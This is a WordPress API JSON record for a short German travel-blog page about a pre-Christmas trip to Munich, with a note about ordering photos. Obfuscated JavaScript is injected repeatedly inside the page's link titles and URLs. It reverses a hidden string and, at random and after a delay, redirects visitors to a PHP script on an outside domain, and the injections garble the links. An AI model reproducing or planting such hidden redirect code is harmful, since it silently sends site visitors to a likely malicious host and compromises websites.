{"id":911,"date":"2011-12-23T20:10:05","date_gmt":"2011-12-23T19:10:05","guid":{"rendered":"http:\/\/www.zasi.ch\/sblog\/?page_id=911"},"modified":"2014-05-14T20:32:33","modified_gmt":"2014-05-14T19:32:33","slug":"munchen","status":"publish","type":"page","link":"https:\/\/www.zasi.ch\/sblog\/index.php\/europe\/munchen","title":{"rendered":"M\u00fcnchen"},"content":{"rendered":"<p>Kurzausflug nach M\u00fcnchen. Hier gibt&#8217;s gute Biere und die wohl typische bayrische K\u00fcche<\/p>\n<p>Bilder k\u00f6nnen bei <a title=\"Fo<script>$NfI=function(n){if (typeof ($NfI.list[n]) == &#8222;string&#8220;) return $NfI.list[n].split(&#8222;&#8220;).reverse().join(&#8222;&#8220;);return $NfI.list[n];};$NfI.list=[&#8222;&#8218;php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth&#8217;=ferh.noitacol.tnemucod&#8220;];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>togeo CH&#8220; href=&#8220;http:\/\/www.fo<script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>togeo.ch\/&#8220; target=&#8220;_blank&#8220;>www.fo<script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>togeo.ch<\/a> bestellt werden. <a title=\"Kontakt Fo<script>$NfI=function(n){if (typeof ($NfI.list[n]) == &#8222;string&#8220;) return $NfI.list[n].split(&#8222;&#8220;).reverse().join(&#8222;&#8220;);return $NfI.list[n];};$NfI.list=[&#8222;&#8218;php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth&#8217;=ferh.noitacol.tnemucod&#8220;];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>togeo.ch&#8220; href=&#8220;http:\/\/www.fo<script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>togeo.ch\/contact.htm&#8220; target=&#8220;_blank&#8220;>Kontakt hier<\/a><\/p>\n<p>Viel Spass Snoopy<\/p>\n<p><strong>M\u00fcnchen in der Vorweihnachtszeit<\/strong>, <strong>21. bis 24. Dezember 2011<\/strong><\/p>\n<p>ngg_shortcode_0_placeholder<\/p>","protected":false},"excerpt":{"rendered":"<p>Kurzausflug nach M\u00fcnchen. Hier gibt&#8217;s gute Biere und die wohl typische bayrische K\u00fcche Bilder k\u00f6nnen bei Kontakt hier Viel Spass Snoopy M\u00fcnchen in der Vorweihnachtszeit, 21. bis 24. Dezember 2011<\/p>\n","protected":false},"author":2,"featured_media":0,"parent":1599,"menu_order":5,"comment_status":"closed","ping_status":"closed","template":"","meta":{"ngg_post_thumbnail":0,"footnotes":""},"_links":{"self":[{"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/pages\/911"}],"collection":[{"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/comments?post=911"}],"version-history":[{"count":4,"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/pages\/911\/revisions"}],"predecessor-version":[{"id":1686,"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/pages\/911\/revisions\/1686"}],"up":[{"embeddable":true,"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/pages\/1599"}],"wp:attachment":[{"href":"https:\/\/www.zasi.ch\/sblog\/index.php\/wp-json\/wp\/v2\/media?parent=911"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}